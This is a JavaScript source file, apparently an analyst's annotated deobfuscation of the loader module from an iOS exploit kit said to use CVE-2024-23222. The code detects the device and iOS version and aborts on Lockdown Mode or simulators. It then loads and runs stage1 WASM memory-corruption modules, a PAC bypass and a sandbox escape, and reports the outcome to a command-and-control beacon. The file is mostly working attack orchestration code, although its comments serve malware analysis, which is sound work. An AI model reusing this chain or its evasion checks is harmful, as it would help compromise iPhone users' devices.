/**
* Exploit Trigger Module
* =======================
* Contains the main exploit trigger function (fqMaGkNR/triggerExploit) and
* supporting functions that orchestrate the CVE-2024-23222 exploit chain.
*
 * Flow:
 * 1. Detect platform and iOS version (platformModule.init with navigator.platform / userAgent)
 * 2. Check for lockdown mode — twice: a synchronous check (On(), which throws) and,
 *    after the version/simulator gates, an async IndexedDB Blob probe (Yn(), returns 1001)
 * 3. Check for simulator (iOS 16+ only; abort with 1003 if detected)
 * 4. Load appropriate stage1 module based on version/flags (no match → 1001)
 * 5. Execute the WASM primitive exploit (stage1), retried up to 20 times
 * 6. Detect JSC runtime type (PSNMWj vs RoAZdq)
 * 7. If PAC-enabled device, load PAC bypass (stage2) and run its integrity check
 * 8. Load and execute sandbox escape (stage3); its lA() return value becomes the chain's result code
*
 * Error codes returned by triggerExploit:
 * 0 = success
 * 1000 = exploit failed (generic error). Also what the entry point beacons when
 *        triggerExploit THROWS instead of returning: the synchronous lockdown
 *        check, stage1 exhausting its 20 attempts, and missing WASM primitives
 *        all throw Error("") rather than return a code.
 * 1001 = unsupported device/version (iOS < 13.0, a throwing simulator/lockdown
 *        probe, or no stage1 variant matching the offsets flags)
 * 1003 = simulator detected (only checked on iOS 16+)
*
* Part of the Coruna exploit kit (group.html).
*/
// ============================================================================
// Helper: Report telemetry result to C2
// ============================================================================
/**
 * Report exploit status to the C2 server as a GET beacon
 * "<resolved path>?e=<statusCode>".
 * Original: fqMaGkNr
 *
 * In this sample the telemetry path is fqMaGkN4([]), which decodes to the
 * empty string, so the guard below returns before anything is sent — the
 * beacon path is dead code as recovered here. It is kept because the loader
 * still calls this function after every run (see the setTimeout entry point);
 * a build with a non-empty path would issue a GET to
 * utilityModule.resolveUrl(path) carrying the result code in the query
 * string, which is the network indicator to watch for. `utilityModule` is not
 * defined in this file.
 *
 * @param {number} statusCode - Result code (0=success, 1000=fail, 1001=unsupported, 1003=simulator)
 * @returns {undefined}
 */
function reportResult(statusCode) {
  const telemetryPath = ""; // fqMaGkN4([]) decodes to ""
  if (telemetryPath === "") {
    return; // no C2 path in this build: nothing is sent
  }
  const beaconUrl = utilityModule.resolveUrl(telemetryPath);
  if (!beaconUrl) {
    return;
  }
  const request = new XMLHttpRequest();
  request.open("GET", `${beaconUrl}?e=${statusCode}`, true);
  request.send(); // fire-and-forget: no handler ever reads the response
}
// ============================================================================
// PAC Bypass Loader
// ============================================================================
/**
 * Load the PAC (pointer authentication) bypass stage matching the device's
 * offsets flags and return an instance of it.
 * Original: fqMaGkNO
 *
 * The flags (wF8NpI, LJ1EuL, CpDW_T, IqxL92) are read from the platform
 * module's offsets table (zn.Nn) and tested in that order: the first truthy
 * one selects the stage2 module id, none selects the "Default" module. The
 * first two variants additionally load a shared prerequisite module and await
 * its ul() before the main stage. Module ids are resolved by
 * globalThis.obChTK.ZKvD0e, the kit's loader, which is defined elsewhere; the
 * variant labels are the analyst's, taken from the log lines.
 *
 * @returns {Promise<object>} PAC bypass instance produced by the module's ga() factory
 * @throws {Error} empty-message Error if the loader resolved the module id to undefined
 */
async function loadPACBypass() {
  console.log(`[PAC] Selecting PAC bypass variant...`);
  const offsets = globalThis.obChTK.hPL3On(
    "14669ca3b1519ba2a8f40be287f646d4d7593eb0"
  ).zn.Nn;
  // Shared stage2 prerequisite module, needed by the first two variants only
  const STAGE2_PREREQ = "477db22c8e27d5a7bd72ca8e4bc502bdca6d0aba";
  // [offsets flag, label, main stage2 module id, needs prerequisite] — order matters
  const VARIANTS = [
    ["wF8NpI", "IntlSegmenter", "29b874a9a6cc9fa9d487b31144e130827bf941bb", true],
    ["LJ1EuL", "AltIOS17", "9db8a84aa7caa5665f522873f49293e8eebccd5c", true],
    ["CpDW_T", "TypeConfusion", "171a7da1934de9e0efb9c1645f4575f88e482873", false],
    ["IqxL92", "iOS17Late", "91b278ddb2aec817b10c1535e0963da74f9b8eeb", false],
  ];
  const FALLBACK = [null, "Default", "b586c88246144bc7975ad4e27ec6d62716bf34ea", false];
  const [, label, stage2Id, needsPrereq] =
    VARIANTS.find(([flag]) => offsets[flag]) || FALLBACK;
  console.log(`[PAC] Selected variant: ${label}`);
  if (needsPrereq) {
    const prereq = await globalThis.obChTK.ZKvD0e(STAGE2_PREREQ);
    await prereq.ul();
  }
  const pacModule = await globalThis.obChTK.ZKvD0e(stage2Id);
  // Kept from the original: only reachable if the loader resolves to undefined
  if (void 0 === pacModule) throw Error("");
  return pacModule.ga(); // ga() creates the PAC bypass instance
}
// ============================================================================
// Main Exploit Trigger
// ============================================================================
/**
 * Main exploit trigger function.
 * Original: fqMaGkNR
 *
 * Orchestrates the full exploit chain:
 * 1. Platform detection
 * 2. Lockdown/simulator checks
 * 3. Stage 1 (WASM primitives)
 * 4. Runtime detection
 * 5. Stage 2 (PAC bypass, if needed)
 * 6. Stage 3 (sandbox escape + payload)
 *
 * Everything reached through `platformModule` (zn.xn, On, Hn, Yn, zn.Qn, zn.Nn,
 * zn.Xn, lr, zn.Sn, $n, zn.qn, zn.Mn) and `globalThis.obChTK` (hPL3On, ZKvD0e)
 * lives in other modules of the kit; the descriptive names in the trailing
 * comments are the analyst's reading of those minified members, not names
 * present in the sample. The bracketed console.log/console.error lines look
 * like analyst instrumentation added during deobfuscation — confirm against
 * the minified original before treating them as indicators.
 *
 * Exit paths (what the setTimeout entry point ends up beaconing):
 * - returns 1001: iOS < 13.0, the simulator probe threw, the async lockdown
 *   probe threw, or no stage1 variant matched the offsets flags
 * - returns 1003: simulator detected (probe only runs on iOS 16+)
 * - returns 1000: any exception inside the runtime/stage2/stage3 try block
 * - THROWS Error(""): synchronous lockdown check positive, stage1 failed all
 *   20 attempts, or zn.Xn missing afterwards — the caller's catch reports
 *   these as 1000 as well
 * - otherwise returns whatever stage3's lA() resolved to (0 = success per the
 *   file header; lA's other return values are not visible in this file)
 *
 * @returns {Promise<number>} Status code (0=success, 1000=error, 1001=unsupported, 1003=simulator)
 */
async function triggerExploit() {
  const _t0 = performance.now(); // only used for the elapsed-time log at the end
  console.log(`[LOADER] === Exploit chain starting ===`);
  // NOTE: `platform` is reused further down as the result-code variable
  // (minifier register reuse); after stage1 it no longer holds navigator.platform.
  var platform = navigator.platform;
  const userAgent = navigator.userAgent;
  // Initialize platform detection with:
  // - Empty telemetry path
  // - Script base URL (decoded from fqMaGkNg)
  // - Cookie/session data (from fqMaGkN4 with encoded params)
  // - Platform and user agent strings
  const platformModule = globalThis.obChTK.hPL3On(
    "14669ca3b1519ba2a8f40be287f646d4d7593eb0"
  );
  console.log(`[LOADER] Platform: ${platform}, UA: ${userAgent.substring(0, 80)}...`);
  // NOTE(review): the "session data" line below carries no argument, so init()
  // receives six arguments here ("", script URL, undefined, undefined,
  // platform, userAgent). If the original passed the decoded
  // fqMaGkN4([3436285875, ...]) cookie/session value as a real argument, this
  // reconstruction has dropped it — verify the arity against the minified sample.
  await platformModule.init(
    "", // telemetry string 1 (fqMaGkN4([]) = "")
    "./7a7d99099b035b2c6512b6ebeeea6df1ede70fbb.min.js", // script URL
    /* session data */ // fqMaGkN4([3436285875, ...]) = cookie/session (see NOTE above: no argument present)
    undefined, // Array(false)[0] = undefined
    undefined, // Array(false)[0] = undefined
    platform,
    userAgent
  );
  console.log(`[PLATFORM] iOS version detected: ${platformModule.zn.xn}`);
  // Synchronous lockdown-mode check. This THROWS rather than returning a code,
  // so a Lockdown Mode device is beaconed by the caller as 1000 (generic
  // failure), not as 1001.
  if (platformModule.On()) { console.error(`[LOADER] ABORT: Lockdown mode enabled`); throw Error(""); }
  // Version gate: zn.xn is compared as an integer-encoded version (130000 =
  // iOS 13.0, 160000 = iOS 16.0 per the analyst); the encoding itself is
  // defined in the platform module, not here.
  if (130000 > platformModule.zn.xn) { console.error(`[LOADER] ABORT: iOS version too old (${platformModule.zn.xn})`); return 1001; }
  // Simulator check is only performed on iOS 16+; older versions skip it entirely.
  if (160000 <= platformModule.zn.xn) {
    console.log(`[LOADER] iOS 16+ detected, checking for simulator...`);
    try {
      await platformModule.Hn(); // detectSimulatorAsync (analyst's name)
    } catch (e) {
      // A throwing probe is treated as "unsupported" (1001), not as "simulator".
      console.error(`[LOADER] ABORT: Simulator check threw`);
      return 1001;
    }
    if (platformModule.zn.Qn) { console.error(`[LOADER] ABORT: Simulator detected`); return 1003; }
  }
  // Second, asynchronous lockdown-mode probe (IndexedDB Blob test per the
  // analyst's note). Unlike On() above, a failure here returns 1001.
  console.log(`[LOADER] Checking lockdown mode via IndexedDB Blob test...`);
  try {
    await platformModule.Yn(); // detectLockdownAsync (analyst's name)
  } catch (e) {
    console.error(`[LOADER] ABORT: Lockdown mode check failed`);
    return 1001;
  }
  // ========================================================================
  // Stage 1: Load and execute WASM memory primitive exploit
  // ========================================================================
  let stage1Module;
  const offsets = platformModule.zn.Nn;
  // Select stage1 variant based on version-specific flags: the first truthy
  // flag wins. Each hash is a module id resolved by obChTK.ZKvD0e, the kit's
  // module loader (defined elsewhere); the version↔flag mapping lives in the
  // platform module and is not visible here.
  console.log(`[LOADER] Selecting stage1 variant for offsets: JtEUci=${offsets.JtEUci}, KeCRDQ=${offsets.KeCRDQ}, ShQCsB=${offsets.ShQCsB}, RbKS6p=${offsets.RbKS6p}, mmrZ0r=${offsets.mmrZ0r}`);
  if (offsets.JtEUci) {
    // Older iOS path (analyst's note)
    stage1Module = await globalThis.obChTK.ZKvD0e(
      "e3b6ba10484875fabaed84076774a54b87752b8a"
    );
  } else if (offsets.KeCRDQ) {
    stage1Module = await globalThis.obChTK.ZKvD0e(
      "57cb8c6431c5efe203f5bfa5a1a83f705cb350b8"
    );
  } else if (offsets.ShQCsB) {
    stage1Module = await globalThis.obChTK.ZKvD0e(
      "d11d34e4d96a4c0539e441d861c5783db8a1c6e9"
    );
  } else if (offsets.RbKS6p) {
    stage1Module = await globalThis.obChTK.ZKvD0e(
      "ea3da0cfb0a5bdb8c440dd4a963f94cbd39d9e44"
    );
  } else if (offsets.mmrZ0r) {
    stage1Module = await globalThis.obChTK.ZKvD0e(
      "7d8f5bae97f37aa318bccd652bf0c1dc38fd8396"
    );
  }
  // No fallback branch: a device whose offsets set none of the five flags is
  // simply not targeted (reported as 1001).
  if (void 0 === stage1Module) { console.error(`[LOADER] ABORT: No stage1 module matched`); return 1001; }
  console.log(`[LOADER] Stage1 module loaded, executing WASM primitive exploit...`);
  // Execute stage1 exploit (builds WASM read/write primitives).
  // `si` is invoked up to 20 times back-to-back with no delay and every
  // exception is discarded, so a stage1 that fails deterministically burns all
  // 20 attempts before the chain gives up. Whether `si` is awaited depends on
  // its constructor name: a plain function that returns a Promise would NOT be
  // awaited here, so its rejection would surface as an unhandled rejection
  // rather than trigger a retry.
  await (async function executeStage1() {
    for (let attempt = 0; attempt < 20; attempt++) {
      try {
        console.log(`[LOADER] Stage1 attempt ${attempt + 1}/20...`);
        if ("AsyncFunction" === stage1Module.si.constructor.name) {
          await stage1Module.si();
        } else {
          stage1Module.si();
        }
        console.log(`[LOADER] Stage1 succeeded on attempt ${attempt + 1}`);
        return;
      } catch (e) {
        // Retry on failure — the error is dropped; nothing is logged or reported.
      }
    }
    console.error(`[LOADER] Stage1 FAILED after 20 attempts`);
    throw Error(""); // propagates to the caller's catch → beaconed as 1000
  })();
  // zn.Xn is expected to be populated by stage1 (it is the object whose zr() is
  // called in the finally block below); its absence after a non-throwing si()
  // is treated as fatal and also thrown rather than returned.
  if (!platformModule.zn.Xn) { console.error(`[LOADER] ABORT: WASM primitives not initialized`); throw Error(""); }
  console.log(`[LOADER] Stage1 complete — WASM read/write primitives active`);
  // ========================================================================
  // Runtime detection + Stage 2 (PAC bypass) + Stage 3 (sandbox escape)
  // ========================================================================
  // From here on `platform` holds the chain's result code.
  platform = 0;
  try {
    // Detect JSC runtime type (PSNMWj vs RoAZdq) from memory layout — sets
    // zn.Sn, which is read immediately below as "device has PAC".
    platformModule.lr(); // detectRuntime (analyst's name)
    console.log(`[RUNTIME] JSC runtime detected: PAC=${platformModule.zn.Sn}`);
    // If device has PAC (Pointer Authentication), load PAC bypass. zn.Mn
    // receives the bypass instance and zn.qn the integrity-check result; on a
    // non-PAC device zn.qn is never assigned here and keeps whatever value the
    // platform module initialised it to.
    if (platformModule.zn.Sn) {
      console.log(`[PAC] Loading PAC bypass (stage2)...`);
      platformModule.zn.Mn = await loadPACBypass();
      console.log(`[PAC] PAC bypass loaded, checking integrity...`);
      platformModule.zn.qn = await platformModule.$n(); // checkPACIntegrity (analyst's name)
      console.log(`[PAC] PAC integrity check: ${platformModule.zn.qn}`);
    }
    // Stage3 variant A requires BOTH the wC3yaB offsets flag and a strictly-true
    // integrity result (`true ===`, not truthiness); a non-PAC device or any
    // other qn value falls through to variant B.
    if (true === offsets.wC3yaB && true === platformModule.zn.qn) {
      // Load stage3 variant A (with PAC bypass)
      console.log(`[STAGE3] Loading sandbox escape variant A (with PAC bypass)...`);
      platform = await (await globalThis.obChTK.ZKvD0e(
        "7f809f320823063b55f26ba0d29cf197e2e333a8"
      )).lA();
    } else {
      // Load stage3 variant B (without PAC / different approach)
      console.log(`[STAGE3] Loading sandbox escape variant B (without PAC)...`);
      platform = await (await globalThis.obChTK.ZKvD0e(
        "c03c6f666a04dd77cfe56cda4da77a131cbb8f1c"
      )).lA();
    }
    // lA()'s resolved value is the chain's result; this file does not show
    // which values it produces beyond the header's "0 = success".
    console.log(`[STAGE3] Sandbox escape result: ${platform}`);
  } catch (e) {
    // Any failure in runtime detection, stage2 or stage3 collapses to the
    // generic 1000 code; the error itself is never sent to the C2.
    console.error(`[LOADER] Exploit chain error:`, e);
    platform = 1000;
  } finally {
    // Cleanup exploit primitives: zr() (labelled cleanup by the analyst) is
    // called on success and failure alike whenever stage1 left zn.Xn set.
    if (platformModule.zn.Xn) {
      console.log(`[LOADER] Cleaning up exploit primitives...`);
      platformModule.zn.Xn.zr(); // cleanup() (analyst's name)
    }
  }
  console.log(`[LOADER] === Exploit chain finished (${(performance.now() - _t0).toFixed(1)}ms) — result: ${platform} ===`);
  return platform;
}
// ============================================================================
// Entry Point: Execute exploit with 10ms delay
// ============================================================================
// Entry point: kick off the chain 10 ms after the script is evaluated and
// beacon the outcome. `self` (rather than `window`) resolves in both a page and
// a Web Worker; which of the two this loader actually runs in is not visible
// from this file. Any exception that escapes triggerExploit — including the
// Error("") thrown by the synchronous lockdown check and by a failed stage1 —
// is reported as the generic 1000 code, and a failing beacon is ignored.
self.setTimeout(async () => {
  try {
    const result = await triggerExploit();
    console.log(`[LOADER] Reporting result: ${result}`);
    // The original forwarded the result through a ternary chain
    // (0→0, 1001→1001, 1000→1000, 1003→1003, anything else passed through),
    // which is an identity mapping: the raw result code is beaconed unchanged.
    reportResult(result);
  } catch (e) {
    console.error(`[LOADER] Top-level error:`, e);
    try {
      reportResult(1000);
    } catch (e2) {
      // beacon failures are deliberately swallowed
    }
  }
}, 10);